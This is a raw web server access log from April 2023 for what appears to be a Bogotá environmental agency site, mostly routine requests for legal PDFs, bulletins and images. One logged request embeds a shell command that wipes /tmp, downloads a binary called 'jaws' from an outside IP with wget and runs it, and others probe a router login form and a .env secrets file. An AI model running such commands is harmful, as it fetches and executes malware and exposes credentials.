52.167.144.167 - - [02/Apr/2023:04:47:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/1606.pdf HTTP/1.1" 304 -
181.237.76.129 - - [02/Apr/2023:04:47:47 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 200 443199
181.237.76.129 - - [02/Apr/2023:04:47:48 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 1
181.237.76.129 - - [02/Apr/2023:04:47:48 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 437759
172.22.2.4 - - [02/Apr/2023:04:46:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
181.237.76.129 - - [02/Apr/2023:04:47:51 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 1
181.237.76.129 - - [02/Apr/2023:04:47:51 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 437759
181.237.76.129 - - [02/Apr/2023:04:47:52 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 1
181.237.76.129 - - [02/Apr/2023:04:47:52 -0500] "GET /mesa/contrasena.pdf HTTP/1.1" 206 437759
201.245.192.253 - - [02/Apr/2023:04:49:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [02/Apr/2023:04:50:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:04:51:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:04:52:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [02/Apr/2023:04:54:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [02/Apr/2023:04:55:45 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.210 - - [02/Apr/2023:04:57:25 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2023:04:57:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [02/Apr/2023:04:56:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:04:57:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
201.245.192.253 - - [02/Apr/2023:04:59:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
59.57.48.2 - - [02/Apr/2023:05:00:12 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+204.44.109.117/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [02/Apr/2023:05:00:45 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.43 - - [02/Apr/2023:05:01:27 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [02/Apr/2023:05:02:27 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:28 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:02:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:05:04:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:05:03:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [02/Apr/2023:05:05:45 -0500] "HEAD / HTTP/1.1" 200 -
173.252.79.24 - - [02/Apr/2023:05:06:30 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
201.245.192.253 - - [02/Apr/2023:05:09:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:05:08:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Apr/2023:05:10:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:09:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [02/Apr/2023:05:14:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [02/Apr/2023:05:15:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:14:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.167 - - [02/Apr/2023:05:16:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/1908.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:05:15:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
201.245.192.253 - - [02/Apr/2023:05:19:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
201.245.192.253 - - [02/Apr/2023:05:20:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42845
201.245.192.253 - - [02/Apr/2023:05:20:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43021
216.245.221.92 - - [02/Apr/2023:05:20:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:20:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:21:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
195.178.120.44 - - [02/Apr/2023:05:23:40 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [02/Apr/2023:05:24:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
20.15.133.162 - - [02/Apr/2023:05:25:37 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2023:05:25:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:25:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [02/Apr/2023:05:26:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:27:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
201.245.192.253 - - [02/Apr/2023:05:29:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
173.252.83.12 - - [02/Apr/2023:05:29:54 -0500] "GET /galeria/galeria/fotos/Humedal-Vaca3P.jpg HTTP/1.1" 200 38460
172.22.2.4 - - [02/Apr/2023:05:29:59 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1140
172.22.2.4 - - [02/Apr/2023:05:30:20 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [02/Apr/2023:05:30:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42845
201.245.192.253 - - [02/Apr/2023:05:30:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43021
216.245.221.92 - - [02/Apr/2023:05:30:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:33:03 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [02/Apr/2023:05:33:03 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [02/Apr/2023:05:33:18 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1919&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1100
181.237.235.86 - - [02/Apr/2023:05:33:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1919.pdf HTTP/1.1" 200 444660
181.237.235.86 - - [02/Apr/2023:05:33:20 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [02/Apr/2023:05:31:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:05:34:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:05:32:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49744
172.22.2.4 - - [02/Apr/2023:05:33:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51022
216.245.221.92 - - [02/Apr/2023:05:35:45 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.46 - - [02/Apr/2023:05:36:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5488.pdf HTTP/1.1" 200 424436
172.22.2.4 - - [02/Apr/2023:05:38:46 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [02/Apr/2023:05:38:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3834&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1100
181.237.235.86 - - [02/Apr/2023:05:38:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3834.pdf HTTP/1.1" 200 488746
201.245.192.253 - - [02/Apr/2023:05:39:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:05:37:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:38:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50654
172.22.2.4 - - [02/Apr/2023:05:38:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51022
201.245.192.253 - - [02/Apr/2023:05:40:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42845
201.245.192.253 - - [02/Apr/2023:05:40:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43021
216.245.221.92 - - [02/Apr/2023:05:40:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:05:44:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:05:43:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.213 - - [02/Apr/2023:05:45:22 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2023:05:45:45 -0500] "HEAD / HTTP/1.1" 200 -
181.54.228.54 - - [02/Apr/2023:05:45:55 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 461656
172.22.2.4 - - [02/Apr/2023:05:44:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
66.249.66.64 - - [02/Apr/2023:05:46:57 -0500] "-" 408 -
181.59.171.228 - - [02/Apr/2023:05:47:24 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.59.171.228 - - [02/Apr/2023:05:47:24 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.59.171.228 - - [02/Apr/2023:05:47:24 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
52.167.144.46 - - [02/Apr/2023:05:48:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4584.pdf HTTP/1.1" 304 -
52.167.144.150 - - [02/Apr/2023:05:48:58 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/2946.pdf HTTP/1.1" 304 -
168.119.101.10 - - [02/Apr/2023:05:49:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [02/Apr/2023:05:49:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
168.119.101.10 - - [02/Apr/2023:05:49:19 -0500] "GET / HTTP/1.1" 200 319
40.77.167.211 - - [02/Apr/2023:05:50:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1896.pdf HTTP/1.1" 200 471217
216.245.221.92 - - [02/Apr/2023:05:50:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:49:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:50:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
52.167.144.167 - - [02/Apr/2023:05:52:54 -0500] "GET /BLA/resoluciones/AUTOS%202018/6581.pdf HTTP/1.1" 200 339603
162.55.165.184 - - [02/Apr/2023:05:54:11 -0500] "GET / HTTP/1.1" 200 319
162.55.165.184 - - [02/Apr/2023:05:54:14 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [02/Apr/2023:05:54:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
157.90.244.54 - - [02/Apr/2023:05:54:20 -0500] "GET / HTTP/1.1" 200 319
157.90.244.54 - - [02/Apr/2023:05:54:21 -0500] "GET / HTTP/1.1" 200 4720
173.252.83.15 - - [02/Apr/2023:05:55:06 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
216.245.221.92 - - [02/Apr/2023:05:55:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:05:55:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.91.8.49 - - [02/Apr/2023:05:57:42 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [02/Apr/2023:05:56:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
66.249.70.213 - - [02/Apr/2023:05:59:19 -0500] "-" 408 -
201.245.192.253 - - [02/Apr/2023:05:59:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
201.245.192.253 - - [02/Apr/2023:06:00:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [02/Apr/2023:06:00:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:06:01:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
179.19.8.232 - - [02/Apr/2023:06:01:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 889384
172.22.2.4 - - [02/Apr/2023:06:01:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:06:02:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
40.77.167.80 - - [02/Apr/2023:06:05:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4336.pdf HTTP/1.1" 200 477553
216.245.221.92 - - [02/Apr/2023:06:05:45 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.210 - - [02/Apr/2023:06:06:01 -0500] "-" 408 -
201.245.192.253 - - [02/Apr/2023:06:06:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
52.167.144.46 - - [02/Apr/2023:06:06:47 -0500] "GET /bla/resoluciones/autos%202014/6569.pdf HTTP/1.1" 200 621825
172.22.2.4 - - [02/Apr/2023:06:08:10 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:06:06:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:06:09:12 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [02/Apr/2023:06:07:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
216.245.221.92 - - [02/Apr/2023:06:10:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:06:11:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
207.46.13.215 - - [02/Apr/2023:06:14:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/5761.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:06:12:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:06:13:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
216.245.221.92 - - [02/Apr/2023:06:15:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:06:16:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
173.252.107.5 - - [02/Apr/2023:06:17:07 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
172.22.2.4 - - [02/Apr/2023:06:18:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:06:20:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42856
201.245.192.253 - - [02/Apr/2023:06:20:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43026
216.245.221.92 - - [02/Apr/2023:06:20:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:06:19:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [02/Apr/2023:06:21:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [02/Apr/2023:06:25:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:06:24:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:06:26:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
173.252.79.24 - - [02/Apr/2023:06:26:34 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
172.22.2.4 - - [02/Apr/2023:06:25:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
66.249.70.210 - - [02/Apr/2023:06:30:22 -0500] "-" 408 -
69.63.189.3 - - [02/Apr/2023:06:30:24 -0500] "GET /conoce-el-proyecto-de-resolucion-por-el-que-se-adoptan-los-planes-de-manejo-ambiental-de-los-humedales-ramsar.html HTTP/1.1" 206 981
201.245.192.253 - - [02/Apr/2023:06:30:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42856
201.245.192.253 - - [02/Apr/2023:06:30:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43026
216.245.221.92 - - [02/Apr/2023:06:30:45 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.46 - - [02/Apr/2023:06:30:48 -0500] "GET /BLA/resoluciones/AUTOS%202022/1790.pdf HTTP/1.1" 200 465774
201.245.192.253 - - [02/Apr/2023:06:31:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:06:31:51 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [02/Apr/2023:06:31:51 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
52.167.144.167 - - [02/Apr/2023:06:31:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/3225.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:06:30:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:06:31:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50273
172.22.2.4 - - [02/Apr/2023:06:31:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54414
173.252.107.18 - - [02/Apr/2023:06:33:45 -0500] "GET /semana-ambiental-500-arboles-plantados-en-el-humedal-el-burro.html HTTP/1.1" 206 768
162.55.175.143 - - [02/Apr/2023:06:35:11 -0500] "GET / HTTP/1.1" 200 319
162.55.175.143 - - [02/Apr/2023:06:35:13 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [02/Apr/2023:06:35:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:06:36:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
186.29.180.79 - - [02/Apr/2023:06:36:51 -0500] "GET /secretaria-de-ambiente-ha-incautado-estos-dias-mas-de-55-kilos-de-palma-silvestre-y-refuerza-controles-previo-a-domingo-de-ramos.html HTTP/1.1" 200 1109
172.22.2.4 - - [02/Apr/2023:06:36:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
8.130.92.227 - - [02/Apr/2023:06:38:10 -0500] "GET /galeria/galeria/fotos/mirador4P.jpg HTTP/1.1" 200 11757
172.22.2.4 - - [02/Apr/2023:06:37:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
34.91.50.11 - - [02/Apr/2023:06:38:44 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
186.102.22.100 - - [02/Apr/2023:06:38:59 -0500] "GET /secretaria-de-ambiente-ha-incautado-estos-dias-mas-de-55-kilos-de-palma-silvestre-y-refuerza-controles-previo-a-domingo-de-ramos.html HTTP/1.1" 200 1109
40.77.167.80 - - [02/Apr/2023:06:39:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 304 -
34.91.77.135 - - [02/Apr/2023:06:39:28 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
179.19.8.232 - - [02/Apr/2023:06:39:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 581071
201.245.192.253 - - [02/Apr/2023:06:40:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42856
201.245.192.253 - - [02/Apr/2023:06:40:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43026
216.245.221.92 - - [02/Apr/2023:06:40:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:06:41:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:06:41:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:06:42:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
34.91.50.11 - - [02/Apr/2023:06:45:03 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [02/Apr/2023:06:45:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:06:46:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
66.249.70.210 - - [02/Apr/2023:06:46:37 -0500] "-" 408 -
52.167.144.167 - - [02/Apr/2023:06:47:36 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 11738
52.167.144.46 - - [02/Apr/2023:06:47:41 -0500] "GET /bla/resoluciones/autos%202020/2247.pdf HTTP/1.1" 200 358654
34.90.16.100 - - [02/Apr/2023:06:48:06 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [02/Apr/2023:06:47:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.128.232.149 - - [02/Apr/2023:06:49:46 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
172.22.2.4 - - [02/Apr/2023:06:48:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
45.33.80.237 - - [02/Apr/2023:06:50:27 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
45.33.80.237 - - [02/Apr/2023:06:50:27 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
45.33.80.237 - - [02/Apr/2023:06:50:27 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
17.241.219.180 - - [02/Apr/2023:06:50:29 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2023:06:50:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:06:51:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
179.32.4.254 - - [02/Apr/2023:06:51:57 -0500] "GET /caminatas-ecologicas-en-bogota-inscribete-y-participa-en-los-recorridos-de-abril.html HTTP/1.1" 200 868
40.77.167.80 - - [02/Apr/2023:06:53:58 -0500] "GET /php/CarreraAdministrativa/INSTRUCTIVO_SISTEMA_PROPIO_SDA_2010.doc HTTP/1.1" 404 1018
172.22.2.4 - - [02/Apr/2023:06:53:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Apr/2023:06:55:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:06:54:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
201.245.192.253 - - [02/Apr/2023:06:56:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
193.32.162.159 - - [02/Apr/2023:06:58:43 -0500] "GET / HTTP/1.1" 200 319
193.32.162.159 - - [02/Apr/2023:06:58:54 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
172.22.2.4 - - [02/Apr/2023:06:59:05 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2027%20del%2028%20de%20diciembre%20de%202018.pdf HTTP/1.1" 304 -
216.245.221.92 - - [02/Apr/2023:07:00:45 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:06:59:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:01:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
52.167.144.167 - - [02/Apr/2023:07:01:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/1871.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:07:00:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
173.252.83.116 - - [02/Apr/2023:07:02:22 -0500] "GET /galeria/galeria/fotos/MeandrodelSay2P.jpg HTTP/1.1" 200 30394
66.249.73.35 - - [02/Apr/2023:07:05:36 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2023:07:05:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:06:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:07:05:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:06:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
216.245.221.92 - - [02/Apr/2023:07:10:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:07:11:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:07:11:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:07:11:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56277
66.249.73.63 - - [02/Apr/2023:07:15:22 -0500] "-" 408 -
216.245.221.92 - - [02/Apr/2023:07:15:45 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.18 - - [02/Apr/2023:07:16:02 -0500] "GET /en-la-semana-de-los-bosques-distrito-avanza-en-la-plantacion-de-nuevos-arboles-para-bogota.html HTTP/1.1" 206 933
201.245.192.253 - - [02/Apr/2023:07:16:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
51.77.247.119 - - [02/Apr/2023:07:17:35 -0500] "POST /public/.env HTTP/1.1" 404 1018
